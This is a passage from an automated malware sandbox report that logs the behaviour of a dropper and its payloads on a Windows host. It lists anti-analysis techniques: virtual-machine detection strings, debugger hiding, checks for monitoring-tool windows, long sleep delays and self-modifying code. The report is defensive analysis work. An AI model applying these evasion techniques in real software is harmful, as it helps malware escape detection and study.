                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSpecial instruction interceptor: First address: 67DD93 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSpecial instruction interceptor: First address: 8D0B23 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 5DDDE86 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 5DDDDE9 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 5F91E84 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeSpecial instruction interceptor: First address: 681E23 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 5DDDD93 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 6030B23 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeSpecial instruction interceptor: First address: 5DE1E23 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeMemory allocated: 4930000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeMemory allocated: 4B90000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeMemory allocated: 49B0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeMemory allocated: 4EA0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeMemory allocated: 4FC0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeMemory allocated: 6FC0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC07D4 rdtsc 0_2_04CC07D4
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeWindow / User API: threadDelayed 526
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeAPI coverage: 3.8 %
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696Thread sleep count: 54 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696Thread sleep time: -108054s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664Thread sleep count: 325 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664Thread sleep time: -9750000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680Thread sleep count: 39 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680Thread sleep time: -78039s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700Thread sleep count: 56 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7700Thread sleep time: -112056s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7780Thread sleep time: -360000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688Thread sleep count: 54 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688Thread sleep time: -108054s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676Thread sleep count: 52 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676Thread sleep time: -104052s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7892Thread sleep time: -36018s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7908Thread sleep time: -42021s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7984Thread sleep time: -36000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7904Thread sleep time: -46023s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7992Thread sleep time: -210000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7896Thread sleep time: -40020s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7916Thread sleep time: -36018s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7900Thread sleep time: -44022s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe TID: 7204Thread sleep time: -210000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe TID: 4564Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe TID: 5264Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_006DDBBE
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E68EE FindFirstFileW,FindClose,11_2_006E68EE
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_006E698F
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_006DD076
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_006DD3A9
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_006E9642
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_006E979D
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_006E9B2B
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E5C97 FindFirstFileW,FindNextFileW,FindClose,11_2_006E5C97
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_006742DE
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeThread delayed: delay time: 922337203685477
                          Source: file.exe, 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1643474943.0000000000BD3000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000001.00000000.1677483084.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.1687648454.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2308286880.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, 37df924488.exe, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp, ae5cfd188c.exe, ae5cfd188c.exe, 0000000A.00000002.2809286945.0000000000487000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_^
                          Source: ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrs
                          Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%Sat
                          Source: 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarea
                          Source: 37df924488.exe, 00000009.00000002.2578174288.00000000014B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
                          Source: file.exe, 00000000.00000003.1679173652.0000000000F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:I
                          Source: firefox.exe, 0000001A.00000002.2790332131.000001B8C5500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                          Source: 2ada66c192.exe, 0000002C.00000002.2919712087.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9-%SystemRoot%\system32\wshbth.dllHyper-V RAW
                          Source: 2ada66c192.exe, 0000001E.00000002.2918205303.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2811951266.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2692799251.0000000001092000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2690178414.000000000108D000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2693268456.00000000010B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: firefox.exe, 00000018.00000002.2795803239.000002BA555C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2788989951.000001B8C541D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
                          Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYQ
                          Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareeA
                          Source: file.exe, 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1643474943.0000000000BD3000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000001.00000000.1677483084.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.1687648454.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2308286880.0000000000C93000.00000080.00000001.01000000.00000007.sdmp, 37df924488.exe, 00000009.00000002.2576273292.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmp, ae5cfd188c.exe, 0000000A.00000002.2809286945.0000000000487000.00000040.00000001.01000000.00000009.sdmp, 37df924488.exe, 0000001B.00000002.2761291474.0000000000A5B000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                          Source: firefox.exe, 0000001A.00000002.2782423918.000001B8C4F1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: firefox.exe, 0000001A.00000002.2790332131.000001B8C5500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 2ada66c192.exe, 0000001E.00000002.2918205303.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                          Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                          Source: firefox.exe, 0000001D.00000002.2786821309.000001AF5AC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5U
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC07D4 rdtsc 0_2_04CC07D4
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006EEAA2 BlockInput,11_2_006EEAA2
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_006A2622
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_006742DE
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A1652B mov eax, dword ptr fs:[00000030h]0_2_00A1652B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A1A302 mov eax, dword ptr fs:[00000030h]0_2_00A1A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00ADA302 mov eax, dword ptr fs:[00000030h]1_2_00ADA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AD652B mov eax, dword ptr fs:[00000030h]1_2_00AD652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00ADA302 mov eax, dword ptr fs:[00000030h]2_2_00ADA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AD652B mov eax, dword ptr fs:[00000030h]2_2_00AD652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ADA302 mov eax, dword ptr fs:[00000030h]6_2_00ADA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AD652B mov eax, dword ptr fs:[00000030h]6_2_00AD652B
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00694CE8 mov eax, dword ptr fs:[00000030h]11_2_00694CE8
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_006D0B62
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006A2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_006A2622
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0069083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0069083F
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006909D5 SetUnhandledExceptionFilter,11_2_006909D5
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00690C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00690C21
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeMemory protected: page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: 37df924488.exe PID: 7148, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 37df924488.exe PID: 6796, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_006D1201
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006B2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_006B2BA5
